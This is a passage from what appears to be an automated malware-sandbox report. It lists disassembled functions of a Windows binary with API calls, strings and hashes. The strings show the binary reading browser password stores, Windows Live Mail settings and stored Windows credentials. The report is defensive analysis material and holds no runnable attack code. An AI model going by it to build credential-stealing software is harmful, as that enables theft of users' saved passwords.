                                                                                                                  Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A973
                                                                                                                  • memset.MSVCRT ref: 0040A996
                                                                                                                  • memset.MSVCRT ref: 0040A9AC
                                                                                                                  • memset.MSVCRT ref: 0040A9BC
                                                                                                                  • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                  • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                  • sprintf.MSVCRT ref: 0040AABE
                                                                                                                  • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                    • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                  • sprintf.MSVCRT ref: 0040AB21
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                  • API String ID: 710961058-601624466
                                                                                                                  • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                  • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                  • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                  • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                  Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: sprintf$memset$_mbscpy
                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                  • API String ID: 3402215030-3842416460
                                                                                                                  • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                  • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                  • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                  • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                  Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                    • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                    • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                  • strlen.MSVCRT ref: 0040F139
                                                                                                                  • strlen.MSVCRT ref: 0040F147
                                                                                                                  • memset.MSVCRT ref: 0040F187
                                                                                                                  • strlen.MSVCRT ref: 0040F196
                                                                                                                  • strlen.MSVCRT ref: 0040F1A4
                                                                                                                  • memset.MSVCRT ref: 0040F1EA
                                                                                                                  • strlen.MSVCRT ref: 0040F1F9
                                                                                                                  • strlen.MSVCRT ref: 0040F207
                                                                                                                  • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                  • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                  • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                  • API String ID: 2003275452-3138536805
                                                                                                                  • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                  • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                  • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                  • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                  Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C3F7
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                  • strrchr.MSVCRT ref: 0040C417
                                                                                                                  • _mbscat.MSVCRT ref: 0040C431
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                  • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                  • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                  • API String ID: 1012775001-1343505058
                                                                                                                  • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                  • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                  • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                  • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                  Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi
                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                  • API String ID: 1439213657-1959339147
                                                                                                                  • Opcode ID: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                                                                                  • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                  • Opcode Fuzzy Hash: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                                                                                  • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                  Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00444612
                                                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                  • strlen.MSVCRT ref: 0044462E
                                                                                                                  • memset.MSVCRT ref: 00444668
                                                                                                                  • memset.MSVCRT ref: 0044467C
                                                                                                                  • memset.MSVCRT ref: 00444690
                                                                                                                  • memset.MSVCRT ref: 004446B6
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                  • String ID: salu
                                                                                                                  • API String ID: 3691931180-4177317985
                                                                                                                  • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                  • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                  • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                  • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                  Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                  • API String ID: 2449869053-232097475
                                                                                                                  • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                  • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                  • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                  • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                  Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • strlen.MSVCRT ref: 00443AD2
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                                                  • memset.MSVCRT ref: 00443B2E
                                                                                                                  • memset.MSVCRT ref: 00443B4B
                                                                                                                  • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                  • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                    • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                  • Salt, xrefs: 00443BA7
                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                  • API String ID: 665470638-2687544566
                                                                                                                  • Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                  • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                  • Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                  • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                  Function 0040F802 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                  • memset.MSVCRT ref: 0040F84A
                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                  • API String ID: 551151806-1288872324
                                                                                                                  • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                  • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                  • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                  • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                  Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sprintf.MSVCRT ref: 0040957B
                                                                                                                  • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                    • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                    • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                    • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                    • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                  • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                  • sprintf.MSVCRT ref: 004095EB
                                                                                                                  • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                  • memset.MSVCRT ref: 0040961C
                                                                                                                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                  • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                  • String ID: caption$dialog_%d$menu_%d
                                                                                                                  • API String ID: 3259144588-3822380221
                                                                                                                  • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                  • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                  • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                  • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                  Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                  • API String ID: 2449869053-4258758744
                                                                                                                  • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                  • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                  • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                  • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                  Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wcsstr.MSVCRT ref: 0040426A
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                  • strchr.MSVCRT ref: 004042F6
                                                                                                                  • strlen.MSVCRT ref: 0040430A
                                                                                                                  • sprintf.MSVCRT ref: 0040432B
                                                                                                                  • strchr.MSVCRT ref: 0040433C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                  • String ID: %s@gmail.com$www.google.com
                                                                                                                  • API String ID: 3866421160-4070641962
                                                                                                                  • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                  • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                  • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                  • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                  Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                                  • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                                    • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                    • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                    • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                  • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                  • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                  • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                                  • memset.MSVCRT ref: 004097BD
                                                                                                                  • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                  • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                  • API String ID: 1035899707-3647959541
                                                                                                                  • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
